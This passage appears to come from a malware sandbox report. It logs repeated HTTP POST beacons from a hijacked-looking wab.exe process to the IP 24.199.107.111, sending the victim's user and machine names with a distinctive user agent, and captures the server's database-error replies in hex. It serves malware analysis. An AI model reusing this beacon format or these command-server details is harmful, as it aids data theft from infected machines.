                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:24.683216095 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:24.683227062 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.54974624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:24.990289927 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:25.152935982 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:25.990933895 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:25 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:25.990957022 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:25.990967989 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.54974724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:26.304471970 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:26.467209101 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:27.266798019 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:26 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:27.266824007 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:27.266835928 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.54974824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:27.574110031 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:27.736748934 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:28.543014050 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:27 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
